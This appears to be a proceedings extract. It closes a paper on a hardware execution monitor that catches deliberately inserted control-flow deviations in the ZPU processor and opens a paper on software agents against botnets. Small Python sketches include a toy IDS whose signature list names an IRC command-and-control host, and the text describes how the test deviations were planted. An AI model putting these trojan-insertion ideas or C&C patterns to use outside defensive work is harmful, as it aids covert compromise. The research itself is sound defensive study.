policy enforced by the aggregate is the conjunction of the policies enforced by each in isolation.<br />
A security automaton can serve as the basis for an enforcement mechanism in an EM.<br />
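As a concrete illustration of the last point, a security automaton can be sketched as a partial transition function that rejects on the first step for which no transition is defined. The class and the toy policy below are our own illustrative assumptions, not taken from (Schneider 2000).<br />

```python
# Illustrative sketch of a security automaton (names and the toy policy are
# invented). The automaton consumes an execution trace one symbol at a time
# and rejects on the first symbol with no defined transition, which is the
# behavior needed to enforce a safety property.

class SecurityAutomaton:
    def __init__(self, start, transitions):
        # transitions: dict mapping (state, symbol) -> next state; any pair
        # absent from the dict is a prohibited step.
        self.state = start
        self.transitions = transitions

    def step(self, symbol):
        """Advance on one trace symbol; return False on a violation."""
        nxt = self.transitions.get((self.state, symbol))
        if nxt is None:
            return False  # this finite prefix already violates the policy
        self.state = nxt
        return True

    def accepts(self, trace):
        return all(self.step(s) for s in trace)

# Toy policy: no 'send' may follow a 'read' (a classic EM-enforceable policy).
NO_SEND_AFTER_READ = {
    ("clean", "send"): "clean",
    ("clean", "read"): "tainted",
    ("tainted", "read"): "tainted",
    # ("tainted", "send") is deliberately absent, hence prohibited.
}
```

Because rejection depends only on a finite prefix, running several such automata in tandem and AND-ing their outputs enforces the conjunction of their policies, matching the composability property above.<br />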
Consider a set of signals A which are dependent on the value of an instruction opcode in a processor.<br />
We assume that, within the set A, all the signals change values synchronously, as they would in a<br />
common clock domain. The possible values of a single member a ∈ A may be described by a set of<br />
finite, discrete values V (e.g., logic low, logic high, high impedance, etc.). These physical values are<br />
represented discretely in an HDL description, as well. For example, a VHDL "standard logic" signal is<br />
nine-valued: V = {U, X, 0, 1, Z, W, L, H, -}. If set A contains n signals, we can denote them a1, a2, ...<br />
an. For a target processor S, containing the signals of A (and others), the state of A at time t may be<br />
denoted At, and the execution trace of the signals in A of processor S may be described as an<br />
ordered set of states ΣS = {A0, A1, ... }. Here, Ψ represents the universe of all possible execution<br />
traces.<br />
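For reference, Schneider's condition for P to define a safety property can be paraphrased in the notation above (this restatement is ours, applied to P as a predicate on single traces; see (Schneider 2000) for the precise formulation): a violating trace must become irremediable after some finite prefix.<br />

```latex
% P defines a safety property iff every violating trace has a finite
% prefix no extension of which can satisfy P:
\forall \sigma \in \Psi :\;
  \neg P(\sigma) \;\Rightarrow\;
  \exists i \;\forall \tau \in \Psi :\; \neg P\bigl(\sigma[..i] \, \tau\bigr)
```

Here σ[..i] denotes the prefix of σ through state A_i, and juxtaposition denotes concatenation.<br />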
We hypothesize that, in terms of instruction set execution:<br />
The signals comprising A may be systematically identified,<br />
The permitted and prohibited sequences of signal states, defining P(ΣS) = True and P(ΣS) = False,<br />
may be inferred from the processor's specification and HDL definition, and<br />
A 3D-EM developed using our construction meets the criteria of a security automaton, enforcing a<br />
safety property.<br />
One goal of our research is to demonstrate that a 3D processor Execution monitor can be developed<br />
which satisfies the conditions of (Schneider 2000) and is able to detect a certain class of MI -<br />
specifically, an MI which causes the processor's instruction-control signals, comprising the<br />
microarchitectural state of the machine, to deviate from their allowable control flow.<br />
6. Experimental evaluation<br />
The ZPU is a simple general-purpose, open-source processor, whose VHDL design we obtained from<br />
OpenCores.org (OpenCores 2010). The ZPU uses 32-bit operands and a subset of the MIPS<br />
instruction set. It has a stack-based architecture, without an accumulator, and no internal processor<br />
registers. It is an unpipelined, single-core design, supporting interrupts, but with no privilege rings or<br />
other complex features. It is intended primarily for system-on-chip implementations in FPGAs.<br />
The top level design of the ZPU (Figure 4) contains a processor core, a timer, a CPU-to-memory I/O<br />
unit, and a DRAM (memory) unit:<br />
We created and added a monitor entity for the processor core. The units communicate as shown in<br />
Figure 5:<br />
From the VHDL design of the ZPU core, we manually identified the control-type signals, i.e., the<br />
signals directly carrying out the instruction-set execution. Some examples of these include<br />
memory_read_enable and memory_write_enable, an interrupt signal, an operand_immediate signal,<br />
etc. The ZPU VHDL design explicitly characterizes the internal state of the processor with named<br />
states, from which we constructed a full finite state machine (of control signal states) and identified all<br />
the legal state-to-state transitions. Some of the ZPU's internal states are shown in Figure 6.<br />
Figure 4: Processor and system configuration without execution monitor<br />
Figure 5: Processor and system configuration with execution monitor added<br />
Figure 6: Some of the ZPU processor internal control states<br />
The ZPU monitor accesses the identified control signals through VHDL "ports". In a physical 3D<br />
design, these signals would transit from the target layer to the monitor layer by through-silicon vias<br />
(TSVs) or some other 3D joining method. This mapping might occur at the 3D floorplanning stage,<br />
before the netlist files have been synthesized into mask database files for each layer. Since this ZPU<br />
design was run in simulation but not physically synthesized, the physical 3D translation is notional.<br />
However, the circuit delay (one full clock cycle) for interlayer signal transmission and the number of<br />
3D posts - approximately 50, in this case - are reasonable, given the current state of 3D interconnect<br />
design (Mysore 2006).<br />
The monitoring logic actually makes two checks. The first check consults a lookup table that contains<br />
the state transition logic. For example, if the monitor detects that the ZPU went from state A to state<br />
B, and that the signal set was S at the completion of the clock cycle when it was in state A, the<br />
monitor looks to see if a matching legal transition exists in the table. The construction of the table is<br />
such that each transition must be unique; the processor can't choose nondeterministically among<br />
several available choices. If the monitor detects that no legal transition from state A with signal set S<br />
to state B existed, then it sets the output "predicate" to false to flag a violation.<br />
The second check verifies that the change from the signal set S, in state A, to the new signal set S', in<br />
state B, was legal according to the transition table. Using the transition selected in the<br />
previous step, the monitor evaluates each signal in S' to see if it violated any of the post-conditions of<br />
the transition. If any post-condition is violated, the monitor again sets the output predicate to false.<br />
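The two checks can be sketched as table lookups; the table layout, state names, and signal names below are illustrative assumptions rather than the actual ZPU monitor implementation.<br />

```python
# Sketch of the monitor's two checks (layout and names are illustrative).
# The transition table maps (state, asserted signal values) to the unique
# legal successor state plus post-conditions on the new signal values.

def monitor_check(table, state_a, signals_a, state_b, signals_b):
    """Return (predicate, reason); predicate is False on a violation."""
    key = (state_a, frozenset(signals_a.items()))
    entry = table.get(key)
    # Check 1: a unique legal transition from (state_a, signals_a) must
    # exist and must lead to the observed next state.
    if entry is None or entry[0] != state_b:
        return False, "illegal state transition"
    # Check 2: the new signal set must satisfy the post-conditions.
    for sig, required in entry[1].items():
        if signals_b.get(sig) != required:
            return False, "post-condition violated: " + sig
    return True, "ok"

# Toy table: from "Nop" with inInterrupt low, the only legal successor is
# "Decode", and inInterrupt must remain low afterwards.
TABLE = {
    ("Nop", frozenset({("inInterrupt", 0)})): ("Decode", {"inInterrupt": 0}),
}
```

With this toy table, an illegal state jump (such as Nop straight to Resync) fails check 1, while an unexpected change to a monitored signal fails check 2.<br />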
The monitor was evaluated using Mentor Graphics' ModelSim tool. In the first test, the unmodified<br />
ZPU processor executes code with the monitor observing. The ZPU software program used for these<br />
particular tests included a broad mix of all of the ZPU instruction set opcodes. In the first test, the<br />
execution of the unmodified ZPU did not cause the monitor to flag any transitions or signal<br />
modifications as illegal. Next, we made small modifications to the ZPU core, then recompiled the<br />
design and ran the simulation again.<br />
Some of the small deviations we introduced in the ZPU processor design included:<br />
When visiting the internal "No-op" state, the ZPU increments a counter; after five "No-op"<br />
instructions, the next one sets the "inInterrupt" signal to 1, causing a violation to be<br />
observed by the monitor.<br />
In another modification, the ZPU tries to go straight from the internal "No-op" state to the "Resync"<br />
state (which is not allowed by the design specification), and again a violation is observed by the<br />
monitor.<br />
The HDL code for these example deviations is below:<br />
when State_Nop =><br />
begin_inst <= …<br />
7. Results<br />
Figure 7: The processor executed normally, and no anomalies were detected<br />
Figure 8: The first processor anomaly was active, and was detected by the monitor<br />
Figure 9: The second processor anomaly was active, and was detected by the monitor<br />
The monitor's transition table had 112 records in it, to cover the 112 allowable transitions among the<br />
23 unique internal processor states. These are reasonably small numbers to implement in a monitor,<br />
but we are also interested in the growth of the size of the monitor, as the target processor becomes<br />
more complex.<br />
Recall from Section 5 that a standard logic signal, as described in VHDL, can represent one of nine<br />
discrete values. For n signals, then, we would expect 9^n possible signal permutations - an<br />
impractically large number, if the state machine must have 9^n states, one for each permutation. We<br />
will explore in future research whether the actual number of required signal permutations, and hence<br />
monitor states, is typically much smaller, as was the case in this example.<br />
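The gap between the worst case and the observed monitor is easy to quantify (the figure of roughly 50 monitored signals is taken from the 3D interconnect discussion above):<br />

```python
# Worst-case signal-permutation count versus the observed ZPU monitor size.
n_signals = 50                      # approximate number of monitored signals
worst_case = 9 ** n_signals         # nine-valued std_logic, n signals
observed_states = 23
observed_transitions = 112

# The worst case exceeds 10^47 permutations, while the actual monitor
# needed only 23 states and 112 transitions.
print(worst_case > 10 ** 47, observed_states, observed_transitions)
```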
We synthesized the design, using a Virtex-5 FPGA target, in two different configurations - the<br />
processor architecture alone, and the processor architecture with the monitor. In both cases, the<br />
maximum design speed was 228 MHz, indicating that adding the monitor did not impose a speed<br />
performance limit on the processor.<br />
8. Conclusions<br />
The following are some of the limitations of this research:<br />
The techniques illustrated are focused on only one of the categories of malicious inclusion from<br />
the taxonomy described earlier; detection and mitigation techniques should be developed for the<br />
other types as well, and this is an open research area.<br />
The Execution monitor's performance must not limit the performance of the target processor<br />
which it monitors. For example, the maximum clock speed of the EM should be at least as fast as<br />
the maximum intended clock speed of the target processor. The power, area, and heat<br />
requirements of the monitor should not exceed the practical limits of the overall 3D design. Also,<br />
the clock-cycle latency between MI activation and detection should be small enough to permit<br />
effective correction. We plan to evaluate 3D-EM designs further, using these performance<br />
measures, in the future.<br />
From our preliminary work on the ZPU 3D-EM design, we reached the following conclusions:<br />
Designing and simulating the operation of a basic 3D monitor for a simple processor design is<br />
feasible. However, the physical design space for 3D monitors needs further exploration, and<br />
monitors for more complex processors should be developed.<br />
As expected, simple deviations from the processor's specified instruction-control behavior can be<br />
detected at runtime.<br />
The 3D Execution monitor is the first hardware-based approach with the potential for identifying<br />
processor MIs both during testing and during real-time, fielded operation - an important advantage<br />
over testbench methods, since delayed triggers may cause an MI to be inactive during<br />
predeployment testing.<br />
9. Future work<br />
For this demonstration, we selected the control signals and developed the stateful representation<br />
manually. In future experiments, we hope to work on methods whereby the microarchitectural control<br />
signals can be automatically identified, and the monitor constructed automatically or semi-automatically<br />
(or identify any reasons why the process cannot be automated). We would like to design<br />
a monitor for a register-based processor with one or more data buses, in order to compare it with<br />
monitoring a stack-based processor like the ZPU. We would also like to design processor anomalies<br />
which accomplish some more meaningful subversions. Finally, we wish to test whether the monitor<br />
can detect unknown MIs, designed by third parties unfamiliar with the monitor construction.<br />
It would be useful to scale up the 3D Execution monitor experiments to more complex processor<br />
designs, with modern features like pipelined and speculative execution, multithreading, vector<br />
operations, virtualization support, and multi-core.<br />
Acknowledgements<br />
This research was funded in part by National Science Foundation Grant CNS-0910734.<br />
References<br />
Adee, S., (2008) "The Hunt for the Kill Switch", [online] IEEE Spectrum, May 2008,<br />
http://spectrum.ieee.org/semiconductors/design/the-hunt-for-the-kill-switch<br />
Agrawal, D., Baktir, S., Karakoyunlu, D., Rohatgi, P., and Sunar, B. (2007) "Trojan Detection Using IC<br />
Fingerprinting", 2007 IEEE Symposium on Security and Privacy.<br />
Defense Science Board (2005). Report of the 2005 Defense Science Board Task Force on High Performance<br />
Microchip Supply, Office of the Undersecretary of Defense for Acquisition, Technology, and Logistics.<br />
Iman, S. (2008) Step-by-Step Functional Verification with SystemVerilog and OVM, Hansen Brown Publishing,<br />
San Francisco.<br />
Jin, Y. and Makris, Y. (2008) "Hardware Trojan Detection Using Path Delay Fingerprint", Proceedings of the 2008<br />
IEEE International Workshop on Hardware-Oriented Security and Trust.<br />
Jin, Y., Kupp, N., and Makris, Y. (2009) "Experiences in Hardware Trojan Design and Implementation",<br />
Proceedings of the IEEE International Workshop on Hardware-Oriented Security and Trust.<br />
King, S., Tucek, J., Cozzie, A., Grier, C. Jiang, W., and Zhou, Y. (2009) "Designing and Implementing Malicious<br />
Hardware", Proceedings of the IEEE International Workshop on Hardware Oriented Security and Trust.<br />
Markoff, J. (2009) "Old Trick Threatens Newest Weapons", [online], New York Times, 27 October.<br />
http://www.nytimes.com/2009/10/27/science/27trojan.html?_r=2.<br />
McCormack, R. (2008) "DoD Broadens 'Trusted' Foundry Program to Include Microelectronics Supply<br />
Chain", Manufacturing & Technology News, Thursday, 28 February.<br />
Mysore, S., Agrawal, B., Srivastava, N., Lin, S., Banerjee, K., and Sherwood, T. (2006) "Introspective 3D Chips",<br />
2006 International Conference on Architectural Support for Programming Languages and Operating<br />
Systems.<br />
Nystedt, D. (2007) "Intel Got its New China Fab for a Bargain, Analyst Says", [online] CIO.com,<br />
http://www.cio.com/article/101450/Intel_Got_Its_New_China_Fab_for_a_Bargain_Analyst_Says<br />
OpenCores.org (2010), [online] http://opencores.org.<br />
Pellerin, D., and Taylor, D. (1997) VHDL Made Easy, Prentice Hall, Upper Saddle River, NJ.<br />
Puttaswamy, K., and Loh, G., (2006) "Implementing Register Files for High-Performance Microprocessors in a<br />
Die-Stacked (3D) Technology", Proceedings of the 2006 Emerging VLSI Technologies and Architectures,<br />
Vol. 00, March.<br />
Rad, R., Plusquellic, J., and Tehranipoor, M. (2008) "Sensitivity Analysis to Hardware Trojans Using Power<br />
Supply Transient Signals", 2008 IEEE International Workshop on Hardware Oriented Security and Trust.<br />
Schneider, F. (2000) "Enforceable Security Policies", ACM Transactions on Information and System Security,<br />
Vol. 3, No. 1, February, pp 30-50.<br />
Tehranipoor, M. and Koushanfar, F. (2010) "A Survey of Hardware Trojan Taxonomy and Detection", IEEE<br />
Design and Test of Computers, vol. 27, issue 1, January/February, pp10-24.<br />
Valamehr, J., Tiwari, M., Sherwood, T., Kastner, R., Huffmire, T., Irvine, C., and Levin, T., (2010) "Hardware<br />
Assistance for Trustworthy Systems through 3-D Integration", Proceedings of the 2010 Annual Computer<br />
Security Applications Conference (ACSAC), Austin, TX, December.<br />
Yinung, F. (2009) "Challenges to Foreign Investment in High-Tech Semiconductor Production in China", United<br />
States International Trade Commission, Journal of International Commerce and Economics, May.<br />
Towards an Intelligent Software Agent System as Defense<br />
Against Botnets<br />
Evan Dembskey and Elmarie Biermann<br />
UNISA, Pretoria, South Africa<br />
French South African Institute of Technology CPUT, Cape Town, South Africa<br />
Dembsej@unisa.ac.za<br />
bierman@xsinet.co.za<br />
Abstract: Computer networks are targeted by state and non-state actors and criminals. With the<br />
professionalization and commoditization of malware we are moving into a new realm where off-the-shelf and<br />
time-sharing malware can be bought or rented by the technically unsophisticated. The commoditization of<br />
malware comes with all the benefits of mass produced software, including regular software updates, access to<br />
fresh exploits and the use of hack farms. To an extent, defence is out of the hands of government and in the<br />
hands of commercial and private actors. However, the cumulative effect of Information Warfare attacks goes<br />
beyond the commercial and private spheres and affects the entire state. Thus the responsibility for defence<br />
should be distributed amongst all actors within a state. As malware increases and becomes more sophisticated<br />
and innovative in its attack vectors, command & control structures and operation, more sophisticated,<br />
innovative and collaborative methods are required to combat it. The current scenario of partial protection due<br />
to resource constraints is inadequate. It is thus necessary to create defence systems that are robust and resilient<br />
against known vectors and vectors that have not previously been used in a manner that is easy and cheap to<br />
implement across government, commercial and private networks without compromising security. We argue that a<br />
significant portion of daily network defence must be allocated to software agents acting in a beneficent botnet<br />
with distributed input from human actors, and propose a framework for this purpose. This paper is based on the<br />
preliminary work of a PhD thesis on the topic of using software agents to combat botnets, and covers the<br />
preliminary literature survey and design of the solution. This includes a crowd sourcing component that uses<br />
information about malware gained from software agents and from human users. Part of this work is based on<br />
previous research by the authors. It is anticipated that the research will result in a clearer understanding of the<br />
role of software agents in defence against computer network operations, and a proof-of-concept<br />
implementation.<br />
Keywords: information warfare, botnet, software agent<br />
1. Introduction<br />
We propose to use distributed software agents (SA) as a method for overcoming botnets and other<br />
malware in the area of Information Warfare (IW). This area of research is important due to the growing<br />
threat posed by malware. This research addresses some of the long term research goals identified by<br />
the US National Research Council (National Research Council (U.S.). Committee on the Role of<br />
Information Technology in Responding to Terrorism et al. 2003) and four of the ten suggested<br />
research areas in (Denning, Denning 2010). It is an extension and refinement of research undertaken<br />
to determine if an IW SA framework is viable (Dembskey, Biermann 2008).<br />
Malware is a reality of networked computers and is being increasingly used by state, criminal and<br />
terrorist actors as weapons, vectors for crime and tools of coercion. While it is debatable whether a<br />
digital Pearl Harbour is a genuine possibility (Smith 1998), it is agreed that malware is on the increase<br />
and is being commoditized (Knapp, Boulton 2008, Microsoft 2010, Dunham, Melnick 2009), though<br />
there is some dissent on this point (Prince 2010). Technically unsophisticated users can purchase<br />
time on existing botnets to accomplish some goal, e.g. phishing attacks, spamming, or the denial,<br />
destruction or modification of data.<br />
A botnet is a distributed group of software agent-like bots that run autonomously and automatically,<br />
usually without the knowledge of the computer’s owner. Botnets are usually, but not necessarily,<br />
malicious. The purpose of botnets is not necessarily destructive; it is often financial gain, which results<br />
in a very different approach to development and Command & Control. An effective process of<br />
prevention, detection and removal will mitigate botnets regardless of their purpose.<br />
IW is warfare that explicitly recognises information as an asset. Computer Network Operations (CNO)<br />
is a form of IW that uses global computer networks to further the aims of warfare. CNO is divided into<br />
Computer Network Attack (CNA) and Computer Network Defence (CND). Increasingly, politically<br />
motivated cyber attacks are focusing on commercial and not government infrastructure (Knapp,<br />
Boulton 2008). Also, money from online scams may be used to fund terrorist and further criminal<br />
activity. SA are a form of software that have the properties of intelligence, autonomy and mobility. We<br />
define SA as programs that autonomously and intelligently acquire, manipulate, distribute and<br />
maintain information on behalf of a user or another software agent.<br />
Intrusion prevention is the Holy Grail of security. This goal is currently unobtainable; there will be<br />
intrusions. The literature shows that traditional defences such as firewalls, antivirus and intrusion<br />
prevention are not effective against botnets (Ollmann 2010). Some researchers believe that antimalware<br />
software is less effective than in the past (Oram, Viega 2009). Researchers at Microsoft<br />
(Microsoft 2010) assert that malware activity increased 8.9% from first to second half of 2009. This is<br />
probably an overly conservative figure. Some researchers estimate that botnet infections are up to<br />
4000% higher than reported (Dunham, Melnick 2009). One significant problem in prevention is that social<br />
engineering (Bailey et al. 2009) is a major cause of infection, which defeats many prevention systems<br />
and undermines detection.<br />
One development that will likely impact the malware threatscape is the arrival of broadband access to<br />
Africa. For an analysis of the impact see (Jansen van Vuuren, Phahlamohlaka & Brazzoli 2010). It is<br />
estimated that there are 100 million computers available for botnet herders to use (Carr, Shepherd<br />
2010). However, we are of the opinion that, due to a range of socio-economic factors, Africa may be a<br />
source of volunteers for botnets similar to Israel’s Defenderhosting.<br />
2. Malware<br />
Malware is a term encompassing all the different categories of malicious software, which include<br />
amongst others Trojans, viruses, worms and spyware. Advances in technology, and especially the<br />
ability to be connected 24/7 to people and resources across the globe, have hugely<br />
increased the volume of malware circulating on global networks. This is evident from the large amount<br />
of spam constantly and increasingly being delivered to mailboxes. According to Damballa (2009) the<br />
success of spamming botnets has led to the commoditization of spam in which volume has become<br />
the primary means to generate cash.<br />
Malware is created and launched in countries across the globe, with different websites listing different<br />
statistics regarding the country of origin on a weekly basis. For example, the USA, China and Russia<br />
are listed by The Spamhaus Project (http://www.spamhaus.org/statistics/countries.lasso) as the<br />
countries where the largest percentage of spam is created and exported, while M86 Security Labs<br />
(http://www.m86security.com/labs/spam_statistics.asp) lists the US, India and Brazil as the recent<br />
largest contributors.<br />
Creating or obtaining malware has become relatively easy with the evolution of technology and<br />
especially the commoditization of malicious code. Different types of malware can be obtained via<br />
malware kits or through specialists offering their services to design and develop unique pieces of<br />
malicious code for different platforms or forums. Some of the more famous examples include<br />
Webattacker, Smeg, Fragus, Zeus and Adpack.<br />
The evolution and spread of malware is directly related to the number of entities being connected,<br />
which is evident today in the increase not only in the amount but also in the different types of malware.<br />
This increase has driven constant research and development to combat such unwanted software,<br />
which in turn pushes the creators of malware to be more innovative. According to<br />
Chiang & Lloyd (2007), the traditional method of using the Internet Relay Chat (IRC) protocol for<br />
command and control made way for new methods of hiding the command and control communication<br />
such as HTTP based communications, encryption and peer-to-peer networks as it became easier to<br />
detect and block IRC traffic. This became evident in the creation and re-invention of botnets such as<br />
Agobot (Wang, 2009), Rustock (Chiang & Lloyd, 2007) and Conficker (Porras, 2009).<br />
The impact of these advances, commoditization and the DIY culture of malware creation on<br />
global networks, and especially on global security, is huge. Malware is used to, amongst other things, steal<br />
personal data, conduct espionage, harm government and business operations, and deny users access to<br />
information and services, and according to a report by the Organisation for<br />
Economic Co-operation and Development (OECD, 2007) it poses a serious threat to the Internet<br />
economy. Securing networks depends not only on security vendors and security specialists but<br />
also on ordinary users of the networks protecting their own stations. The increasing use of social<br />
networks such as Facebook, Twitter and MySpace, as well as the mobile generation, provides increasing<br />
opportunities for malware to access contact details and personal information.<br />
It is vital for the Internet economy that robust and resilient counter-systems are constantly in<br />
operation, adapting to changing conditions.<br />
3. Current malware detection techniques<br />
The first hint of a malware infection may be the receipt of an email stating that a system appears to be<br />
infected and has abused a different system; the convention is that administrative contacts of some<br />
form are listed at global regional information registry sites such as AfriNIC, ARIN, APNIC, LACNIC<br />
and RIPE to assist in communication. The abuse may take the form of spam, scanning activity, DDoS<br />
attacks, phishing or harassment (Schiller, Binkley & Harley 2007).<br />
It is a poor security method indeed that relies on informants only. A better approach is the use of<br />
network-monitoring tools such as wireshark or tcpdump as malware activity results in data that can be<br />
analysed. Examples of prevalent data types are (Bailey et al. 2009):<br />
DNS Data: Data regarding name resolution can be obtained by mirroring data to and from DNS<br />
servers and can be used to detect both botnet command and control (C&C) and attack behaviour.<br />
Netflow Data: Netflow data represents information gathered from the network by sampling traffic<br />
flows and obtaining information regarding source and destination IP addresses and port numbers.<br />
This is not available on all networks.<br />
Packet Tap Data: Packet tap data provides a more fine-grained view than netflow, but is<br />
generally more costly in terms of hardware and computation. Simple encryption reduces this<br />
visibility back to the same order as netflow.<br />
Address Allocation Data: Knowing where hosts and users are in the network can be a powerful<br />
tool for identifying malware reconnaissance behaviour and rapid attribution.<br />
Honeypot Data: Placed on a network with the express intention of them being turned into botnet<br />
members, honeypots can be a powerful tool for gaining insight into botnet means and motives.<br />
Host Data: Host level data, from OS and application configurations, logs and user activity<br />
provides a wealth of security information and can avoid the visibility issues with encrypted data.<br />
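These data sources can feed simple heuristics. As an illustrative sketch (the field names and the threshold are our own assumptions, not from the paper), the following flags hosts whose sampled netflow-style records show the destination fan-out typical of scanning or spamming bots:<br />

```python
from collections import defaultdict

def flag_scanners(flows, dst_threshold=50):
    """Flag source IPs contacting unusually many distinct destinations.

    `flows` is an iterable of (src_ip, dst_ip, dst_port) tuples, as might be
    sampled from netflow data. High fan-out is a common (though not
    conclusive) sign of scanning or spamming behaviour.
    """
    fanout = defaultdict(set)
    for src, dst, port in flows:
        fanout[src].add((dst, port))
    return {src for src, dsts in fanout.items() if len(dsts) >= dst_threshold}

flows = [("10.0.0.5", f"203.0.113.{i}", 25) for i in range(60)]  # noisy host
flows += [("10.0.0.9", "198.51.100.7", 443)] * 10                # quiet host
print(flag_scanners(flows))  # only the noisy host is flagged
```

Real deployments would of course combine several such signals rather than rely on a single fan-out count.<br />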
An even better method is an Intrusion Detection System (IDS). An IDS can either be host-based<br />
(HIDS) or network-based (NIDS). Both of these are further categorised by the type of algorithm used,<br />
namely anomaly- and signature-based detection. Anomaly–based techniques develop an<br />
understanding of what normal behaviour is on a system, and reports any deviation. Signature-based<br />
techniques use representations of known malware to decide if software is indeed malicious. A<br />
specialised form of anomaly-based detection, called specification-based detection makes use of a<br />
rule set to decide if software is malicious. Violation of these rules indicates possible malicious<br />
software.<br />
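The two detection styles can be contrasted in a few lines of code. This is a toy illustration with invented byte signatures and a naive mean/standard-deviation baseline, not a production IDS:<br />

```python
import statistics

SIGNATURES = [b"\x4d\x5a\x90bot", b"irc.evil.example"]  # toy byte patterns

def signature_match(payload):
    """Signature-based: report if any known-malicious pattern occurs."""
    return any(sig in payload for sig in SIGNATURES)

def anomaly_score(value, baseline):
    """Anomaly-based: distance from learned 'normal' in standard deviations."""
    mean = statistics.mean(baseline)
    stdev = statistics.pstdev(baseline) or 1.0
    return abs(value - mean) / stdev

baseline_pkts_per_min = [100, 110, 95, 105, 90]   # learned "normal" rates
print(signature_match(b"connect irc.evil.example now"))  # True
print(anomaly_score(400, baseline_pkts_per_min) > 3)     # True: clear outlier
```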
A NIDS sees protected hosts in terms of the external interfaces to the rest of the network, rather than<br />
as a single system, and gets most of its results by network packet analysis. Much of the data used is<br />
the same as discussed using the manual methods above. A HIDS focuses on individual systems.<br />
That does not mean each host runs its own independently administered HIDS application (they are<br />
generally administered centrally); rather, it means that the HIDS monitors activity on a protected host. It can pick up evidence of<br />
breaches that have evaded outward-facing NIDS and firewall systems or have been introduced by<br />
other means, such as internal attacks, direct tampering from internal users and the introduction of<br />
malicious code from removable media (Schiller, Binkley & Harley 2007).<br />
Malware can also be detected forensically. Though this occurs after damage has been incurred, it is<br />
important for a number of reasons including legal purposes. Forensic aims can include identification,<br />
preservation, analysis, and presentation of evidence. Digital investigations that are or might be<br />
presented in a court of law must meet the applicable standards of admissible evidence. Admissibility<br />
is a concept that varies according to jurisdiction (Schiller, Binkley & Harley 2007).<br />
Two techniques that are essentially forensic in nature are darknets and honeynets, though the<br />
knowledge gained from their use helps to prevent, detect and remove botnets. A darknet is a closed<br />
private network used for file sharing. However, the term has been extended in the security sphere to<br />
apply to IP address space that is routed but contains no active hosts and therefore carries no legitimate traffic.<br />
Darknets are most useful as a global resource for sites and groups working against botnets on an<br />
Internet-wide basis (Schiller, Binkley & Harley 2007). A honeypot is a decoy system set up to attract<br />
attackers and study their methods and capabilities. A honeynet is usually defined as consisting of a<br />
number of honeypots in a network, offering the attacker real systems, applications, and services to<br />
work on and monitored transparently by a Layer 2 bridging device (honeywall). A static honeynet can<br />
quickly be spotted and blacklisted by attackers, but distributed honeynets attempt to address that<br />
issue and are likely to capture richer, more varied data (Schiller, Binkley & Harley 2007). In contrast to<br />
honeynets, darknets do not advertise themselves.<br />
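Because a darknet range should receive no legitimate traffic, exploiting one is mostly bookkeeping: any source that sends into it is scanning, misconfigured or infected. A minimal sketch, where the address range and the (src, dst) packet tuples are illustrative assumptions:<br />

```python
import ipaddress

DARKNET = ipaddress.ip_network("192.0.2.0/24")  # routed but unused space

def suspicious_sources(packets):
    """Count, per source, packets addressed into the darknet.

    No legitimate traffic should arrive here, so every hit implicates
    its source as a scanner, a misconfiguration, or a bot.
    """
    hits = {}
    for src, dst in packets:
        if ipaddress.ip_address(dst) in DARKNET:
            hits[src] = hits.get(src, 0) + 1
    return hits

packets = [("203.0.113.9", "192.0.2.17"), ("203.0.113.9", "192.0.2.200"),
           ("198.51.100.4", "8.8.8.8")]
print(suspicious_sources(packets))  # {'203.0.113.9': 2}
```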
Botnets, the malware we are interested in, are difficult to combat for the following reasons (Bailey et<br />
al. 2009):<br />
All aspects of the botnet’s life-cycle are evolving constantly.<br />
Each detection technique comes with its own set of tradeoffs with respect to false positives and<br />
false negatives.<br />
Different types of networks approach the botnet problem with differing goals, with different<br />
visibility into the botnet behaviours, and different sources of data with which to uncover those<br />
behaviours.<br />
A successful solution for combating botnets will need to cope with each of these realities and their<br />
complex interactions with each other.<br />
4. Software agents<br />
A software agent is a program that autonomously acquires, manipulates, distributes and maintains<br />
information on behalf of some entity. We reject the trend of labeling software utilities such as<br />
aggregators and download managers as SA; we base our definition on the properties of the software.<br />
The literature defines a large number of agent properties. Not all properties are found in all agents,<br />
but in order to be termed an agent, software must satisfy some minimum set of these properties. Bigus<br />
and Bigus (Bigus, Bigus 2001) suggest that these are autonomy, intelligence and mobility. These<br />
properties are defined as follows:<br />
Autonomy - The autonomous agent exercises control over its own actions and has some degree<br />
of control over its internal state. It displays judgment when faced with a situation requiring a<br />
decision, and makes a decision without direct external intervention.<br />
Intelligence - This does not imply self-awareness, but the ability to behave rationally and pursue a<br />
goal in a logical and rational manner. Intelligence varies between simple coded logic and complex<br />
AI-based methods such as inferencing and learning.<br />
Mobility- Mobility is the degree to which agents move through the network. Some may be static<br />
while others may migrate as the need arises. The decision to move should be made by the agent<br />
(Murch, Johnson 1999), thus ensuring the agent has the property of autonomy.<br />
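A skeleton of how these three properties might appear in code (purely illustrative; the class, method names and thresholds are our own, not from any cited framework):<br />

```python
import random

class DefensiveAgent:
    """Toy agent exhibiting autonomy (acts without external commands),
    intelligence (simple rule-based decisions), and mobility (chooses
    for itself when to migrate to another host)."""

    def __init__(self, host):
        self.host = host

    def observe(self, local_alert_rate):
        # Autonomy + intelligence: the agent decides on its own,
        # here via simple coded logic rather than learning.
        if local_alert_rate > 0.8:
            return "investigate"
        if local_alert_rate < 0.1:
            return self.migrate()  # nothing to do here; move on
        return "monitor"

    def migrate(self):
        # Mobility: the decision to move is made by the agent itself.
        self.host = random.choice(["hostA", "hostB", "hostC"])
        return f"migrated to {self.host}"

agent = DefensiveAgent("hostA")
print(agent.observe(0.9))  # investigate
```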
From these properties we can judge that SA have potential applications in dealing with tasks that are<br />
ill-defined or less structured. It is also apparent that SA interact with their task environments locally;<br />
the implication of this is that the same agent can exhibit different behaviour in different environments<br />
(Liu 2001). Padgham & Winikoff (2004) provide a list of reasons why agents are<br />
useful, including loose coupling, decentralisation, persistence, better functioning in open and complex<br />
systems, and reactiveness as well as proactiveness. The use of SA to combat botnets is not<br />
unprecedented. It has already been suggested that AF.MIL should be purposely made part of a<br />
botnet (Williams 2008). Some researchers see botnets as types of SA (Bigus, Bigus 2001). Other<br />
researchers (Stytz, Banks 2008) have begun to work on the problem of implementing such an<br />
approach.<br />
5. Proposed system<br />
Vulnerabilities are introduced in software deliberately or accidentally during development, or via<br />
software or configuration changes during operation. Botnets are not typically introduced during<br />
software development; they are usually introduced later, and usually unintentionally. Possible vectors<br />
of infection are viruses, worms and Trojans. These may be introduced via email, download, drive-by<br />
download, network worm or some external storage device. According to (Cruz 2008) the majority of<br />
infections occur due to downloads (53%) and infection via other malware (43%). Email and<br />
removable drives account for 22% of infections. Instant Messaging, vulnerabilities, P2P, iFrame<br />
compromises, other infected files and other vectors account for 27% (the total is higher than 100%<br />
